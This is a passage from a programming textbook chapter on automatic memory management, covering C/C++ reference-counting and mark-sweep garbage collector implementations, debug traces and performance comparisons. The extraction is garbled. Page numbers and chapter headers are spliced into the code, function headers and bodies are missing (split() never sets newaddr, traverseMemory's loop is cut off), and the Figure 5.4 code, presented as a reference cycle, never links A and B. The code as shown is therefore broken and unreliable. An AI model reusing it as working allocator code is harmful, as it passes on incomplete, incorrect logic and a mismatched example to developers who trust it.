COUNT(free) = COUNT(free)-1;
MSG0("RefCountMemoryManager::");
MSG1("dec(): decrementing ram[%lu] ",free);
MSG1("to %lu\n",COUNT(free));
if(COUNT(free)==FREE)
{
MSG0("RefCountMemoryManager::");
MSG1("dec(): releasing ram[%lu]\n",free);
release(free);
}
return;
}/*end dec----------------------------------------------------*/
#ifdef DEBUG_RC_MEM_MGR
printState();
#endif
return;
}/*end release------------------------------------------------*/
/*
4 cases ( F=free O=occupied )
FOF -> [F]
OOF -> O[F]
FOO -> [F]O
OOO -> OFO
*/
Automatic Memory Management 297
if(prev==0)
{
if(next==0)
{
COUNT(current)=FREE;
}
else if(COUNT(next)!=FREE)
{
COUNT(current)=FREE;
}
else if(COUNT(next)==FREE)
{
U4 temp;
MSG0("RefCountMemoryManager::merge():");
MSG0("merging to NEXT\n");
COUNT(current)=FREE;
SIZE(current)=SIZE(current)+SIZE(next)+SZ_HEADER;
NEXT(current)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=current; }
}
}
else if(next==0)
Chapter 5
{
if(COUNT(prev)!=FREE)
{
COUNT(current)=FREE;
}
else if(COUNT(prev)==FREE)
{
MSG0("RefCountMemoryManager::merge():");
MSG0("merging to PREV\n");
SIZE(prev)=SIZE(prev)+SIZE(current)+SZ_HEADER;
NEXT(prev)=NEXT(current);
}
}
else if((COUNT(prev)!=FREE)&&(COUNT(next)!=FREE))
{
COUNT(current)=FREE;
}
else if((COUNT(prev)!=FREE)&&(COUNT(next)==FREE))
{
U4 temp;
MSG0("RefCountMemoryManager::merge():");
MSG0("merging to NEXT\n");
COUNT(current)=FREE;
SIZE(current)=SIZE(current)+SIZE(next)+SZ_HEADER;
NEXT(current)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=current; }
}
else if((COUNT(prev)==FREE)&&(COUNT(next)!=FREE))
{
MSG0("RefCountMemoryManager::merge():");
MSG0("merging to PREV\n");
SIZE(prev)=SIZE(prev)+SIZE(current)+SZ_HEADER;
NEXT(prev)=NEXT(current);
PREV(next)=prev;
}
else if((COUNT(prev)==FREE)&&(COUNT(next)==FREE))
{
U4 temp;
MSG0("RefCountMemoryManager::merge():");
MSG0("merging with both sides\n");
SIZE(prev)=SIZE(prev)+
SIZE(current)+SZ_HEADER+
SIZE(next)+SZ_HEADER;
NEXT(prev)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=prev; }
}
return;
}/*end merge--------------------------------------------------*/
void RefCountMemoryManager::printState()
{
U4 i;
U4 current;
i=0;
Automatic Memory Management 299
current=START;
while(NEXT(current)!=0)
{
printf("%lu) [P=%lu]",i,PREV(current));
printf("[addr=%lu]",current);
if(COUNT(current)==FREE){ printf("[FREE]"); }
else{ printf("[Ct=%lu]",COUNT(current)); }
printf("[Sz=%lu]",SIZE(current));
printf("[N=%lu]\n",NEXT(current));
current = NEXT(current);
i++;
}
printf("%lu) [P=%lu]",i,PREV(current));
printf("[addr=%lu]",current);
if(COUNT(current)==FREE){ printf("[FREE]"); }
else{ printf("[Ct=%lu]",COUNT(current)); }
printf("[Sz=%lu]",SIZE(current));
printf("[N=%lu]\n",NEXT(current));
return;
}/*end printState---------------------------------------------*/
Tests
I performed two different tests against this memory manager. A
debug test was performed to make sure that the manager was doing
what it was supposed to do. If you modify my source code, I would
suggest running the debug test again to validate your changes. Once
I was sure that the memory manager was operational, I turned off
debugging features and ran a performance test.
Chapter 5
0) [P=0][addr=16][Ct=1][Sz=8][N=40]
1) [P=16][addr=40][FREE][Sz=230][N=0]
RefCountMemoryManager::allocate(12)
RefCountMemoryManager::split(): split=YES
0) [P=0][addr=16][Ct=1][Sz=8][N=40]
1) [P=16][addr=40][Ct=1][Sz=12][N=68]
2) [P=40][addr=68][FREE][Sz=202][N=0]
RefCountMemoryManager::allocate(33)
RefCountMemoryManager::split(): split=YES
0) [P=0][addr=16][Ct=1][Sz=8][N=40]
1) [P=16][addr=40][Ct=1][Sz=12][N=68]
2) [P=40][addr=68][Ct=1][Sz=33][N=117]
3) [P=68][addr=117][FREE][Sz=153][N=0]
RefCountMemoryManager::allocate(1)
RefCountMemoryManager::split(): split=YES
0) [P=0][addr=16][Ct=1][Sz=8][N=40]
1) [P=16][addr=40][Ct=1][Sz=12][N=68]
2) [P=40][addr=68][Ct=1][Sz=33][N=117]
3) [P=68][addr=117][Ct=1][Sz=1][N=134]
4) [P=117][addr=134][FREE][Sz=136][N=0]
RefCountMemoryManager::allocate(122)
RefCountMemoryManager::split(): split=NO
0) [P=0][addr=16][Ct=1][Sz=8][N=40]
1) [P=16][addr=40][Ct=1][Sz=12][N=68]
2) [P=40][addr=68][Ct=1][Sz=33][N=117]
3) [P=68][addr=117][Ct=1][Sz=1][N=134]
4) [P=117][addr=134][Ct=1][Sz=136][N=0]
RefCountMemoryManager::allocate(50)
0) [P=0][addr=16][Ct=1][Sz=8][N=40]
1) [P=16][addr=40][Ct=1][Sz=12][N=68]
2) [P=40][addr=68][Ct=1][Sz=33][N=117]
3) [P=68][addr=117][Ct=1][Sz=1][N=134]
4) [P=117][addr=134][Ct=1][Sz=136][N=0]
ptr[5]==NULL!
copying ptr[0]
RefCountMemoryManager::checkAddress(5439516)
RefCountMemoryManager::inc(): address resolves to index 16
RefCountMemoryManager::inc(): incrementing ram[16] to 2
copying ptr[1]
RefCountMemoryManager::checkAddress(5439540)
RefCountMemoryManager::inc(): address resolves to index 40
RefCountMemoryManager::inc(): incrementing ram[40] to 2
copying ptr1
RefCountMemoryManager::checkAddress(5439516)
RefCountMemoryManager::inc(): address resolves to index 16
RefCountMemoryManager::inc(): incrementing ram[16] to 3
overwriting ptr1 with ptr3
RefCountMemoryManager::checkAddress(5439516)
RefCountMemoryManager::dec(): address resolves to index 16
RefCountMemoryManager::dec(): decrementing ram[16] to 2
RefCountMemoryManager::checkAddress(5439540)
Automatic Memory Management 301
pointer
RefCountMemoryManager::checkAddress(5439516)
RefCountMemoryManager::dec(): address resolves to index 16
RefCountMemoryManager::dec(): decrementing ram[16] to 0
RefCountMemoryManager::dec(): releasing ram[16]
0) [P=0][addr=16][FREE][Sz=8][N=40]
1) [P=16][addr=40][Ct=2][Sz=12][N=68]
2) [P=40][addr=68][FREE][Sz=202][N=0]
RefCountMemoryManager::checkAddress(5439540)
RefCountMemoryManager::dec(): address resolves to index 40
RefCountMemoryManager::dec(): decrementing ram[40] to 1
RefCountMemoryManager::checkAddress(5439540)
RefCountMemoryManager::dec(): address resolves to index 40
RefCountMemoryManager::dec(): decrementing ram[40] to 0
RefCountMemoryManager::dec(): releasing ram[40]
302 Chapter 5
Trade-Offs
The reference counting approach to garbage collection is convenient
because it offers a type of collection that is incremental, which is to
say that the bookkeeping needed to reclaim garbage is done in
short, bite-sized bursts. This allows the memory manager to do its
jobs without introducing a significant time delay into the program’s
critical path. Some garbage collectors wait to do everything at once
so that users may experience a noticeable pause while a program
runs.
While the reference counting approach is fast, it also suffers from
some serious problems. For example, reference counting garbage
collectors cannot reclaim objects that reference each other. This is
known as a cycle (see Figure 5.4).
Figure 5.4
void function()
{
void **A; //points to value storing an address
void **B;
A = (void*)malloc(sizeof(void*));
B = (void*)malloc(sizeof(void*));
printf("address A=%p\t",A);
printf("value in A=%p\n\n",*A);
printf("address B=%p\t",B);
printf("value in B=%p\n",*B);
return;
}
void main()
{
function();
return;
Chapter 5
}
If the variable A goes out of scope, its heap storage will still not be
reclaimed. This is because B still references it so that its reference
count is 1. The same holds true for B. Because of the pointer tom-
foolery performed, and because of the nature of reference counting,
neither of these blocks of memory will ever have their storage
reclaimed because their reference counts will never be able to reach
zero.
NOTE The ugly truth is that the inability to handle cyclic references
is what allows reference counting schemes to develop memory leaks.
This is one reason why most run-time systems, like the Java virtual
machine, avoid reference counting garbage collection.
304 Chapter 5
Figure 5.5
Figure 5.6
306 Chapter 5
QUESTION
OK, so if the manager looks for pointers, what does a pointer
look like?
ANSWER
Some compilers add a special tag to pointers. The problem
with this approach is that the tag consumes part of a pointer’s
storage space and prevents a pointer from being capable of
referencing the full address space. I decided that in my imple-
mentation, I would use a conservative garbage collection approach
and consider any 32-bit value to be a potential pointer. This basi-
cally means that I have to scan memory byte-by-byte to
enumerate every possible 32-bit value (see Figure 5.7).
Figure 5.7
Figure 5.8
NOTE This function does not suggest that garbage collection occur;
it demands that garbage collection occur.
Implementation
I decided to implement a mark-sweep garbage collector by
modifying the sequential fit implementation in Chapter 4. My imple-
mentation of the reference counting memory manager required four
files:
Table 5.2
File Use
Chapter 5
driver.cpp
This file contains the main() entry point. You can build my imple-
mentation to execute a diagnostic test or a performance test. To
build the diagnostic version, you will need to comment out the
PerformanceTestDriver() invocation and uncomment the
debugTest() invocation. You will also need to activate the
DEBUG_XXX macros in the mallocV4.cpp file.
308 Chapter 5
#include<mallocV5.cpp>
#include<perform.cpp>
void debugTest()
{
void *ptr;
void *ptr1;
void *ptr2;
unsigned long *lptr;
unsigned long allocs[6]={8,12,33,1,122,50};
initMemMgr(270,4);
//8
ptr = newMalloc(allocs[0]); if(ptr==NULL){ printf
("ptr==NULL!\n"); }
//12
ptr = newMalloc(allocs[1]); if(ptr==NULL){ printf
("ptr==NULL!\n"); }
ptr2=ptr;
//33
ptr = newMalloc(allocs[2]); if(ptr==NULL){ printf
("ptr==NULL!\n"); }
lptr=(unsigned long*)ptr;
*lptr =(unsigned long)ptr;
lptr=NULL;
//1
//first garbage collection here
//122
ptr = newMalloc(allocs[4]); if(ptr==NULL){ printf
("ptr==NULL!\n"); }
ptr1=ptr;
forceCollection();
closeMemMgr();
return;
}/*end debugTest----------------------------------------------*/
void main()
{
//need this for mark-sweep
getTOS();
}/*end main---------------------------------------------------*/
You might notice a weird-looking function called getTOS(), which is
invoked in main(). This is the first statement in main(), and it
resolves to a macro defined in memmgr.cpp. This macro, which
stands for get Top Of the Stack, obtains the value of EBP register so
that my code knows where to stop its scan of the stack while look-
ing for pointers. The main() function, like other C functions, has a
prologue that sets up the EBP register as a stack frame pointer.
_main PROC NEAR
push ebp
mov ebp, esp
By saving the value of EBP as soon as main() begins, I ensure that
I can scan as much of the stack as legally possible.
Chapter 5
mallocV5.cpp
Because we are now in the domain of automatic memory manage-
ment, I disabled the newFree() function that has traditionally
been defined in this file. The newMalloc() function is still opera-
tional, albeit using a different underlying object. If you wish to
perform a debug/diagnostic test, you will need to activate the
DEBUG_XXX macros.
You also might want to keep in mind that I have included a
forceCollection() wrapper function that allows you to invoke
the garbage collector.
310 Chapter 5
#include<stdio.h>
#include<stdlib.h>
#include<windows.h>
//#define DEBUG_MS_MEM_MGR
//#define DEBUG_MALLOCV5
#include<memmgr.cpp>
/*
wrapper functions
*/
MarkSweepMemoryManager *mmptr;
void closeMemMgr()
{
delete(mmptr);
}
#ifdef DEBUG_MALLOCV5
(*mmptr).printState();
#endif
return(ptr);
}
void forceCollection()
{
(*mmptr).forceCollection();
return;
}
perform.cpp
The PerformanceTest class defined in this file has not been
modified very much. The only thing that changed was the imple-
mentation of the runTest() member function. Specifically, I had
to remove the calls to newFree(), which are no longer valid. I also
replaced the array of void*addr[] pointers with a single addr
pointer so that I could overwrite its contents and produce garbage.
unsigned long PerformanceTest::runTest()
{
unsigned long *allocs;
unsigned long i;
unsigned long ticks1,ticks2;
void *addr;
getAllocArray(allocs);
initMemMgr(1024*1024,200);
ticks1 = GetTickCount();
Chapter 5
for(i=0;i<nAllocations;i++)
{
addr = (char *)newMalloc(allocs[i]);
if(addr==NULL)
{
printf("mallco()=addr[%lu]=%lu failed\n",i,addr);
exit(1);
}
}
forceCollection();
ticks2 = GetTickCount();
312 Chapter 5
closeMemMgr();
free(allocs);
return(ticks2-ticks1);
}/*end runTest------------------------------------------------*/
memmgr.cpp
The MarkSweepMemoryManager class defined in this file is
basically an extended version of the SequentialFitMemory-
Manager. To give you an idea of how this class operates, I have
enumerated the possible paths of execution for this class in Figure
5.9.
Figure 5.9
#endif
/*
list element format
|0 3||4 7|| 8 ||9 12||13 .. n|
[PREV][NEXT][STATE][SIZE][payload]
U4 U4 U1 U4 ?
#define FREE 0
#define OCCUPIED 1
#define TESTING 2
char *stateStr[3]={"FREE","OCCUPIED","TESTING"};
U4 stackFrameBase;
class MarkSweepMemoryManager
{
private:
HANDLE handle;
U1 *ram; //pointer to memory storage
U4 size; //nbytes in storage
U1 ticks; //used to trigger collection
U1 period; //# ticks before collect
void trace();
void mark();
void traverseStack();
314 Chapter 5
void traverseHeap();
void traverseMemory(U1 *addr,U4 nbytes);
int checkAddress(void *addr);
void sweep();
public:
void*allocate(U4 nbytes);
void forceCollection();
void printState();
};
MarkSweepMemoryManager::MarkSweepMemoryManager(U4 nbytes,U1
maxticks)
{
handle = GetProcessHeap();
if(handle==NULL)
{
printf("MarkSweepMemoryManager::");
printf("MarkSweepMemoryManager():");
printf("invalid handle\n");
exit(1);
}
ram = (U1*)HeapAlloc(handle,HEAP_ZERO_MEMORY,nbytes);
size = nbytes;
if(size<=SZ_HEADER)
{
printf("MarkSweepMemoryManager::");
printf("MarkSweepMemoryManager():");
printf("not enough memory fed to constructor\n");
exit(1);
}
PREV(START)=0;
NEXT(START)=0;
STATE(START)=FREE;
SIZE(START)=size-SZ_HEADER;
MSG0("MarkSweepMemoryManager::");
Automatic Memory Management 315
ticks = 0;
period = maxticks;
MSG1("ticks=%u, ",ticks);
MSG1("period=%u\n",period);
return;
}/*end constructor--------------------------------------------*/
MarkSweepMemoryManager::~MarkSweepMemoryManager()
{
if(HeapFree(handle,HEAP_NO_SERIALIZE,ram)==0)
{
printf("MarkSweepMemoryManager::");
printf("~MarkSweepMemoryManager():");
printf("could not free heap storage\n");
return;
}
MSG0("MarkSweepMemoryManager::");
MSG0("~MarkSweepMemoryManager()");
MSG1("free ram[%lu]\n",size);
return;
}/*end destructor---------------------------------------------*/
/*
U4 nbytes - number of bytes required
returns address of first byte of memory region allocated
( or NULL if cannot allocate a large enough block )
Chapter 5
*/
MSG0("MarkSweepMemoryManager::");
MSG1("allocate(%lu)\n",nbytes);
if(nbytes==0)
{
MSG0("MarkSweepMemoryManager::");
MSG0("allocate(): zero bytes requested\n");
return(NULL);
}
316 Chapter 5
ticks++;
MSG0("MarkSweepMemoryManager::");
MSG1("allocate(): gc check -> [ticks,period]=[%u,",ticks);
MSG1("%u]\n",period);
if(ticks==period)
{
trace();
ticks=0;
}
current = START;
while(NEXT(current)!=0)
{
if((SIZE(current)>=nbytes)&&(STATE(current)==FREE))
{
split(current,nbytes);
return((void*)&ram[current]);
}
current = NEXT(current);
}
if((SIZE(current)>=nbytes)&&(STATE(current)==FREE))
{
split(current,nbytes);
return((void*)&ram[current]);
}
return(NULL);
}/*end allocation---------------------------------------------*/
/*
breaks [free] region into [alloc][free] pair, if possible
*/
if(SIZE(addr)>= nbytes+SZ_HEADER+SZ_HEADER)
{
U4 oldnext;
U4 oldprev;
U4 oldsize;
U4 newaddr;
MSG0("MarkSweepMemoryManager::");
MSG0("split(): split=YES\n");
oldnext=NEXT(addr);
oldprev=PREV(addr);
oldsize=SIZE(addr);
NEXT(addr)=newaddr;
PREV(addr)=oldprev;
STATE(addr)=OCCUPIED;
SIZE(addr)=nbytes;
NEXT(newaddr)=oldnext;
PREV(newaddr)=addr;
STATE(newaddr)=FREE;
SIZE(newaddr)=oldsize-nbytes-SZ_HEADER;
}
else
{
MSG0("MarkSweepMemoryManager::");
MSG0("split(): split=NO\n");
STATE(addr)=OCCUPIED;
}
return;
}/*end split--------------------------------------------------*/
Chapter 5
void MarkSweepMemoryManager::forceCollection()
{
MSG0("MarkSweepMemoryManager::");
MSG0("forceCollection(): forcing collection\n");
trace();
return;
}/*end forceCollection----------------------------------------*/
void MarkSweepMemoryManager::trace()
{
MSG0("MarkSweepMemoryManager::");
MSG0("trace(): initiating mark-sweep\n");
mark();
318 Chapter 5
sweep();
return;
}/*end trace--------------------------------------------------*/
void MarkSweepMemoryManager::mark()
{
U4 i;
U4 current;
i=0;
current=START;
while(NEXT(current)!=0)
{
if(STATE(current)==OCCUPIED)
{
STATE(current)=TESTING;
}
current = NEXT(current);
i++;
}
if(STATE(current)==OCCUPIED)
{
STATE(current)=TESTING;
}
#ifdef DEBUG_MS_MEM_MGR
MSG0("MarkSweepMemoryManager::");
MSG0("mark(): toggle OCCUPIED to TESTING\n");
printState();
#endif
MSG0("MarkSweepMemoryManager::");
MSG0("mark(): initiating stack and heap traversals\n");
traverseStack();
traverseHeap();
return;
}/*end mark---------------------------------------------------*/
void MarkSweepMemoryManager::traverseStack()
{
U4 currentAddr;
Automatic Memory Management 319
MSG0("MarkSweepMemoryManager::traverseStack():");
MSG1("EBP=%p\t",stackFrameBase);
MSG1("ESP=%p\n",currentAddr);
traverseMemory((U1*)currentAddr,(stackFrameBase-currentAddr));
return;
}/*end traverseStack------------------------------------------*/
void MarkSweepMemoryManager::traverseHeap()
{
MSG0("MarkSweepMemoryManager::traverseHeap(): looking at
heap\n");
traverseMemory(ram,size);
return;
}/*end traverseHeap-------------------------------------------*/
start = (U4)addr;
end = start + nbytes -1;
MSG0("MarkSweepMemoryManager::traverseMemory(): ");
MSG1("[start=%lx,",start);
MSG1(" end=%lx]\n",end);
Chapter 5
for(i=start;i<=end-3;i++)
{
//point to integer value at memory address i
iptr = (U4*)i;
return;
}/*end traverseMemory-----------------------------------------*/
if(addr==NULL){ return(FALSE); }
if(index<SZ_HEADER){ return(FALSE); }
MSG0("MarkSweepMemoryManager::checkAddress(): ");
MSG1("failed sanity chk (already found) addr=%p ",addr);
return(FALSE);
}
MSG0("MarkSweepMemoryManager::checkAddress(): ");
MSG1("live memory block at addr=%p ",addr);
MSG1("index=%lu\n",index);
STATE(index)=OCCUPIED;
return(TRUE);
}/*end checkAddress-------------------------------------------*/
Automatic Memory Management 321
void MarkSweepMemoryManager::sweep()
{
U4 i;
U4 current;
MSG0("MarkSweepMemoryManager::");
MSG0("sweep(): link sweep intiated\n");
i=0;
current=START;
while(NEXT(current)!=0)
{
if(STATE(current)==TESTING)
{
MSG0("MarkSweepMemoryManager::");
MSG1("sweep(): garbage found at index=%lu\n",
current);
release(current);
}
current = NEXT(current);
i++;
}
if(STATE(current)==TESTING)
{
MSG0("MarkSweepMemoryManager::");
MSG1("sweep(): garbage found at index=%lu\n",current);
release(current);
}
return;
}/*end sweep--------------------------------------------------*/
Chapter 5
if(index<SZ_HEADER)
{
MSG0("MarkSweepMemoryManager::");
MSG0("release(): address in first 13 bytes\n");
return;
}
merge(PREV(index),index,NEXT(index));
#ifdef DEBUG_MS_MEM_MGR
MSG0("MarkSweepMemoryManager::");
MSG0("release(): post merge layout\n");
printState();
#endif
return;
}/*end release------------------------------------------------*/
if(prev==0)
{
if(next==0)
{
STATE(current)=FREE;
}
else if((STATE(next)==OCCUPIED)||(STATE(next)==TESTING))
{
STATE(current)=FREE;
}
else if(STATE(next)==FREE)
{
U4 temp;
MSG0("MarkSweepMemoryManager::merge():");
MSG0("merging to NEXT\n");
STATE(current)=FREE;
Automatic Memory Management 323
SIZE(current)=SIZE(current)+SIZE(next)+SZ_HEADER;
NEXT(current)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=current; }
}
}
else if(next==0)
{
if((STATE(prev)==OCCUPIED)||(STATE(prev)==TESTING))
{
STATE(current)=FREE;
}
else if(STATE(prev)==FREE)
{
MSG0("MarkSweepMemoryManager::merge():");
MSG0("merging to PREV\n");
SIZE(prev)=SIZE(prev)+SIZE(current)+SZ_HEADER;
NEXT(prev)=NEXT(current);
}
}
/*
cases:
OTO -> OFO
TTT TFT
TTO TFO
OTT OFT
OTF O[F]
TTF T[F]
FTO [F]O
FTT [F]T
FTF [F]
*/
Chapter 5
else if((STATE(prev)==OCCUPIED)&&(STATE(next)==OCCUPIED))
{
STATE(current)=FREE;
}
else if((STATE(prev)==TESTING)&&(STATE(next)==TESTING))
{
STATE(current)=FREE;
}
else if((STATE(prev)==TESTING)&&(STATE(next)==OCCUPIED))
{
STATE(current)=FREE;
}
else if((STATE(prev)==OCCUPIED)&&(STATE(next)==TESTING))
{
STATE(current)=FREE;
324 Chapter 5
else if((STATE(prev)==OCCUPIED)&&(STATE(next)==FREE))
{
U4 temp;
MSG0("MarkSweepMemoryManager::merge():");
MSG0("merging to NEXT\n");
STATE(current)=FREE;
SIZE(current)=SIZE(current)+SIZE(next)+SZ_HEADER;
NEXT(current)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=current; }
}
else if((STATE(prev)==TESTING)&&(STATE(next)==FREE))
{
U4 temp;
MSG0("MarkSweepMemoryManager::merge():");
MSG0("merging to NEXT\n");
STATE(current)=FREE;
SIZE(current)=SIZE(current)+SIZE(next)+SZ_HEADER;
NEXT(current)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=current; }
}
else if((STATE(prev)==FREE)&&(STATE(next)==OCCUPIED))
{
MSG0("MarkSweepMemoryManager::merge():");
MSG0("merging to PREV\n");
SIZE(prev)=SIZE(prev)+SIZE(current)+SZ_HEADER;
NEXT(prev)=NEXT(current);
PREV(next)=prev;
}
else if((STATE(prev)==FREE)&&(STATE(next)==TESTING))
{
MSG0("MarkSweepMemoryManager::merge():");
MSG0("merging to PREV\n");
SIZE(prev)=SIZE(prev)+SIZE(current)+SZ_HEADER;
NEXT(prev)=NEXT(current);
PREV(next)=prev;
}
else if((STATE(prev)==FREE)&&(STATE(next)==FREE))
{
U4 temp;
MSG0("MarkSweepMemoryManager::merge():");
MSG0("merging with both sides\n");
SIZE(prev)=SIZE(prev)+
Automatic Memory Management 325
SIZE(current)+SZ_HEADER+
SIZE(next)+SZ_HEADER;
NEXT(prev)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=prev; }
}
return;
}/*end merge--------------------------------------------------*/
void MarkSweepMemoryManager::printState()
{
U4 i;
U4 current;
i=0;
current=START;
while(NEXT(current)!=0)
{
printf("%lu) [P=%lu]",i,PREV(current));
printf("[addr=%lu]",current);
printf("[St=%s]",stateStr[STATE(current)]);
printf("[Sz=%lu]",SIZE(current));
printf("[N=%lu]\n",NEXT(current));
current = NEXT(current);
i++;
}
printf("%lu) [P=%lu]",i,PREV(current));
printf("[addr=%lu]",current);
printf("[St=%s]",stateStr[STATE(current)]);
Chapter 5
printf("[Sz=%lu]",SIZE(current));
printf("[N=%lu]\n",NEXT(current));
return;
}/*end printState---------------------------------------------*/
Tests
I performed two different tests against this memory manager. A
debug test was performed to make sure that the manager was doing
what it was supposed to do. If you modify my source code, I would
suggest running the debug test again to validate your changes. Once
326 Chapter 5
I was sure that the memory manager was operational, I turned off
debugging features and ran a performance test.
The debug test was performed by executing the code in the
debugTest() function defined in the driver.cpp source file. I
keep things fairly simple, but at the same time, I take a good, hard
look at what is going on. If you decide to run a debug test, you will
want to make sure that the DEBUG_XXX macros in
mallocV4.cpp are turned on. You will also want to comment out
the PerformanceTestDriver() function call in main().
The following output was generated by the debug build of the
memory manager:
address of ptr = 0065FDE0
address of ptr1 = 0065FDC0
address of ptr2 = 0065FDBC
address of lptr = 0065FDC4
address of allocs = 0065FDC8
MarkSweepMemoryManager::MarkSweepMemoryManager(): ram[270],
ticks=0, period=4
MarkSweepMemoryManager::allocate(8)
MarkSweepMemoryManager::allocate(): gc check ->
[ticks,period]=[1,4]
MarkSweepMemoryManager::split(): split=YES
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=FREE][Sz=236][N=0]
MarkSweepMemoryManager::allocate(12)
MarkSweepMemoryManager::allocate(): gc check ->
[ticks,period]=[2,4]
MarkSweepMemoryManager::split(): split=YES
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=FREE][Sz=211][N=0]
MarkSweepMemoryManager::allocate(33)
MarkSweepMemoryManager::allocate(): gc check ->
[ticks,period]=[3,4]
MarkSweepMemoryManager::split(): split=YES
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=FREE][Sz=165][N=0]
MarkSweepMemoryManager::allocate(1)
MarkSweepMemoryManager::allocate(): gc check ->
[ticks,period]=[4,4]
MarkSweepMemoryManager::trace(): initiating mark-sweep
MarkSweepMemoryManager::mark(): toggle OCCUPIED to TESTING
0) [P=0][addr=13][St=TESTING][Sz=8][N=34]
1) [P=13][addr=34][St=TESTING][Sz=12][N=59]
2) [P=34][addr=59][St=TESTING][Sz=33][N=105]
3) [P=59][addr=105][St=FREE][Sz=165][N=0]
Automatic Memory Management 327
MarkSweepMemoryManager::split(): split=YES
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=OCCUPIED][Sz=122][N=240]
4) [P=105][addr=240][St=FREE][Sz=30][N=0]
MarkSweepMemoryManager::allocate(50)
MarkSweepMemoryManager::allocate(): gc check ->
[ticks,period]=[2,4]
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=OCCUPIED][Sz=122][N=240]
4) [P=105][addr=240][St=FREE][Sz=30][N=0]
ptr==NULL!
328 Chapter 5
//12
ptr = newMalloc(allocs[1]); if(ptr==NULL){ printf
("ptr==NULL!\n"); }
ptr2=ptr;
Automatic Memory Management 329
//33
ptr = newMalloc(allocs[2]); if(ptr==NULL){ printf
("ptr==NULL!\n"); }
lptr=(unsigned long*)ptr;
*lptr =(unsigned long)ptr;
lptr=NULL;
//1
//first garbage collection here
The ptr variable has overwritten itself several times and will point
to the most recent heap allocation. In addition, a variable in the
heap, initially pointed to by lptr, stores an address belonging to
the heap.
When the newMalloc(allocs[3]) code has been reached,
the ticks variable will be equal to 4, and garbage collection will
occur. This will cause the 8-byte block that was allocated first to be
reclaimed. All the other allocated heap blocks still have “live”
Chapter 5
pointers.
Once garbage collection has occurred, the following code will
execute:
//122
ptr = newMalloc(allocs[4]);
if(ptr==NULL){ printf("ptr==NULL!\n"); }
ptr1=ptr;
forceCollection();
330 Chapter 5
Trade-Offs
While my mark-sweep collector does not exactly compete with the
reference counting version, it does successfully handle the
cyclic-reference problem that caused a memory leak in the previous
implementation. With a little refinement, I could probably whittle
down the performance time to less than 100 milliseconds. I will
present some suggestions for improvement at the end of this
chapter.
Automatic Memory Management 331
Figure 5.10
Because all the “live” pointers on the stack, in the heap, and in the
data segment need to be updated with new values when the mem-
ory blocks that they point to are relocated, copying collection can be
difficult. Not only does this add complexity, but these extra steps
also hurt execution time. In addition, extra storage space is needed
Chapter 5
Performance Comparison
At this point, it might be enlightening to gather all of the statistics
from the past two chapters together:
Table 5.5
Algorithm Time to Service 1,024 Requests
bit map 856 milliseconds
sequential fit 35 milliseconds
segregated lists 5 milliseconds
reference counting 30 milliseconds
mark-sweep 430 milliseconds
Potential Additions
The mark-sweep garbage collector that I provided in this chapter
was a bare-bones implementation (and that is an understatement). I
deliberately kept things as simple as I could so that you could grasp
the big picture without being bogged down with details. Seeing as
how my mark-sweep collector had only the minimum set of fea-
tures, I thought it might be wise to point out a few of the features
that could be added to round out the functionality of the mark-sweep
collector.
Automatic Memory Management 333
In addition to requesting storage from the heap via the new opera-
tor, most compilers will also emit the code necessary to pass the
new object to its constructor:
; invoke the new operator, allocate 12 bytes
push 12 ; 0000000cH
call ??2@YAPAXI@Z ; operator new
add esp, 4
; pass allocated memory (the object) to the constructor
push 15 ; 0000000fH
mov ecx, DWORD PTR $T196[ebp]
call ??0BluePrint@@QAE@H@Z ; BluePrint::BluePrint
mov DWORD PTR -36+[ebp], eax
If manual memory management is being used, the programmer will
include source code that will take care of reclaiming the object’s
storage in the heap.
delete(ptr);
Chapter 5
As before, not only will the compiler emit the instructions neces-
sary to reclaim the object, but it will also emit the instructions
necessary to call the object’s destructor before reclamation occurs:
push 1
mov ecx, DWORD PTR $T200[ebp]
call ??_GBluePrint@@QAEPAXI@Z ; BluePrint::'scalar
deleting destructor'
mov DWORD PTR -40+[ebp], eax
If a garbage collector is being used to manage reclamation, the pro-
grammer will never issue a call to delete(). This means that the
garbage collector will have to do this behind the scenes. In order to
obey this protocol, a memory manager will need to know which
334 Chapter 5
Figure 5.11
This new field, which we’ll call TYPE, indicates if the memory block
is an object, and if it is, then it indexes an element in an array of
function pointers. These function pointers store the addresses of
destructor functions. This setup is displayed in Figure 5.12.
Figure 5.12
the memory block is an object, the collector will invoke the object’s
destructor before it reclaims the memory block’s storage.
Naturally, there are many more details to consider than I’ve men-
tioned, such as setting up the table of function pointers and handling
nested objects that call different destructors. You will have to exper-
iment with a number of different approaches. Nevertheless, I hope
to have guided you in the right direction.
Indirect Addressing
During the discussion of copying collection and memory realloca-
tion, you have seen how moving memory can make life difficult for
an application. The only solution that seems halfway tractable is to
traverse the application’s stack, heap, and data segment and update
the pointer values to reference new locations.
There is, however, a different approach. Rather than have point-
ers reference actual memory, you can have them store handles. A
handle could be implemented simply by a structure that maps an
integer handle value to a physical address:
336 Chapter 5
struct MemHandle
{
unsigned long value;
void *ptr;
};
This would allow you to change the address of a memory block (i.e.,
void *ptr) without having to change the value stored by pointers
in the application (i.e., unsigned long value). When an
address change does occur, all you need to update is a single
MemHandle structure instead of potentially dozens of application
variables. This type of relationship is displayed in Figure 5.13.
Figure 5.13
When the stack hits its limit, the garbage collector kicks in and
